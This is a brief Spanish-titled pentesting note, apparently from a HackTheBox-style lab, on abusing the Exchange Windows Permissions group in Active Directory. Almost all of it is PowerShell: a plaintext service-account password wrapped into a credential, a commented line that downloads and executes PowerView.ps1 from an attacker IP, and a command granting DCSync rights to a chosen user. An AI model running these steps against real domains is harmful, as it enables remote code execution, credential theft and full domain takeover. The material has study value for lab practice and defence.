Vulnerabilidades con el grupo Exchange
Exchange Windows Permissions

Last updated

Last updated
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\svc-alfresco', $SecPassword)
# powershell : IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8080/PowerView.ps1')
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity x0pr4nt3s -Rights DCSync